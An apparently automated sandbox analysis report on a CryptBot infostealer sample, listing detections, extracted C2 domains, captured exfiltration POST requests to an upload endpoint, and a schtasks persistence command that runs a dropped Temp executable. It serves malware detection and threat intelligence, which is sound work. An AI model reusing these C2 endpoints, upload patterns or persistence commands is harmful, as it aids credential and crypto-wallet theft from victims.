Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532996
MD5: 7105a2ba8c897b6c2072a6ab0bdecdf1
SHA1: d3659027483c2825c8430a41a0c3e439aac78e2f
SHA256: abc53ac9f7564ceba0a7548b880b1e92c8e0329ff9680e3c5f06abcbd4e869b9
Tags: exe, user-Bitsight

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies and credit cards, and of taking screenshots of the infected system. All stolen data is bundled into a zip file that is uploaded to the C2.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

Source: file.exe.7432.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["analforeverlovyu.top", "pn.top", "n.top", "0asevtbv17pn.top", "+sevtbv17pn.top", "@sevtbv17pn.top", "sevtbv17pn.top"]}
Source: file.exe ReversingLabs: Detection: 34%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_005315B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_005315B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_6C2F14B0
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 4_2_005381E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36AC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36AD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C392EF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C30AF80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C3CF960h 4_2_6C30E8C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C31E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C3104F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 4_2_6C3904E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C310610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31A720
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C31A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C310010
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C3CD014h] 4_2_6C3C4110
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C314203
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C398250
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31C2C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31A330
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C31A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36BDF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36BF50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 4_2_6C349F90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C3A9900
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C32B987
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C32B98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36BAC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C367AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 4_2_6C31D424
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C3CDFF4h 4_2_6C363440
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 4_2_6C31D5A4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C3635F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 4_2_6C31D724
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C31D050
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C387100
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C31D2B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C36B280
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 4_2_6C3693B0

Networking

Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49730 -> 80.66.81.78:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49731 -> 80.66.81.78:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49734 -> 80.66.81.78:80
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Malware configuration extractor URLs: pn.top
Source: Malware configuration extractor URLs: n.top
Source: Malware configuration extractor URLs: 0asevtbv17pn.top
Source: Malware configuration extractor URLs: +sevtbv17pn.top
Source: Malware configuration extractor URLs: @sevtbv17pn.top
Source: Malware configuration extractor URLs: sevtbv17pn.top
Source: Joe Sandbox View ASN Name: TEAM-HOSTASRU
Source: global traffic HTTP traffic detected:
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary70837388
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 411
    Host: sevtbv17pn.top
Source: global traffic HTTP traffic detected:
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary12658505
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 89281
    Host: sevtbv17pn.top
Source: global traffic HTTP traffic detected:
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary60576727
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 31924
    Host: sevtbv17pn.top
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: sevtbv17pn.top
Source: unknown HTTP traffic detected:
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary70837388
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 411
    Host: sevtbv17pn.top
Source: file.exe, 00000000.00000003.1859870408.00000000010FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sevtbv17pn.top/
Source: file.exe, 00000000.00000003.1859870408.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768676819.00000000010DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sevtbv17pn.top/v1/upload.php
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TMdMlTZMAWbrEijBRYMr.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: file.exe String found in binary or memory: https://keruzam.com/update.php?compName
Source: file.exe, 00000000.00000003.2374347014.000000006A364000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: https://keruzam.com/update.php?compName=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C309B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber, 4_2_6C309B99

System Summary

Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_005351B0 4_2_005351B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_00533E20 4_2_00533E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2FCD00 4_2_6C2FCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2FEE50 4_2_6C2FEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3B4E80 4_2_6C3B4E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C300FC0 4_2_6C300FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C340870 4_2_6C340870
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C332A7E 4_2_6C332A7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C334490 4_2_6C334490
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3044F0 4_2_6C3044F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C328570 4_2_6C328570
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C330580 4_2_6C330580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C322110 4_2_6C322110
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33FE10 4_2_6C33FE10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C331E40 4_2_6C331E40
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C305880 4_2_6C305880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33D99E 4_2_6C33D99E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C34DA20 4_2_6C34DA20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C31F510 4_2_6C31F510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3296A0 4_2_6C3296A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3377D0 4_2_6C3377D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F3000 4_2_6C2F3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3070C0 4_2_6C3070C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3311BE 4_2_6C3311BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3412C0 4_2_6C3412C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33F3C0 4_2_6C33F3C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3BAB60 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3C3490 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3C3310 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3C5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3C5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3C38D0 appears 38 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AWxXIdIDvb
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\uoijNYchjvFkhpkdArrg
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000003.1824507467.0000000001C34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: tmdmltzmawbreijbrymr.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: tmdmltzmawbreijbrymr.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: tmdmltzmawbreijbrymr.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static file information: File size 7457792 > 1048576
Source: file.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4c5600
Source: file.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1da600
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_00538230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 4_2_00538230
Source: file.exe Static PE information: section name: .eh_fram
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: TMdMlTZMAWbrEijBRYMr.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_0053A499 push es; iretd 4_2_0053A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C338C2A push edx; mov dword ptr [esp], ebx 4_2_6C338C3E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C364DB0 push eax; mov dword ptr [esp], ebx 4_2_6C365018
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C344DC1 push eax; mov dword ptr [esp], ebx 4_2_6C344DD5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C336E03 push edx; mov dword ptr [esp], ebx 4_2_6C336E17
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C344FA1 push eax; mov dword ptr [esp], ebx 4_2_6C344FB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C36E860 push eax; mov dword ptr [esp], ebx 4_2_6C36E98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C358850 push eax; mov dword ptr [esp], ebx 4_2_6C358E4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C340852 push eax; mov dword ptr [esp], ebx 4_2_6C340866
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C34285C push edx; mov dword ptr [esp], ebx 4_2_6C342870
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3729A0 push eax; mov dword ptr [esp], ebx 4_2_6C372CD4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3729A0 push edx; mov dword ptr [esp], ebx 4_2_6C372CF3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3A09E0 push eax; mov dword ptr [esp], edi 4_2_6C3A0B5A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C36EAC0 push eax; mov dword ptr [esp], ebx 4_2_6C36EBE3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C344BE1 push eax; mov dword ptr [esp], ebx 4_2_6C344BF5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C380460 push eax; mov dword ptr [esp], ebx 4_2_6C3807FF
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C330452 push eax; mov dword ptr [esp], ebx 4_2_6C33048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C348451 push 890005EAh; ret 4_2_6C348459
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3304BE push eax; mov dword ptr [esp], ebx 4_2_6C33048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3364A3 push edx; mov dword ptr [esp], ebx 4_2_6C3364B7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3304AD push eax; mov dword ptr [esp], ebx 4_2_6C33048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33A527 push eax; mov dword ptr [esp], ebx 4_2_6C33A53B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C311AAA push eax; mov dword ptr [esp], ebx 4_2_6C3C6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33A6F7 push eax; mov dword ptr [esp], ebx 4_2_6C33A70B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C316003 push eax; mov dword ptr [esp], ebx 4_2_6C3C6AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C316003 push edx; mov dword ptr [esp], edi 4_2_6C3C6B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C316098 push eax; mov dword ptr [esp], ebx 4_2_6C3C6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3440D5 push ecx; mov dword ptr [esp], ebx 4_2_6C3440E9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3381E5 push edx; mov dword ptr [esp], ebx 4_2_6C3381F9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33023B push eax; mov dword ptr [esp], ebx 4_2_6C330251
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\TMdMlTZMAWbrEijBRYMr.dll

Boot Survival

Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
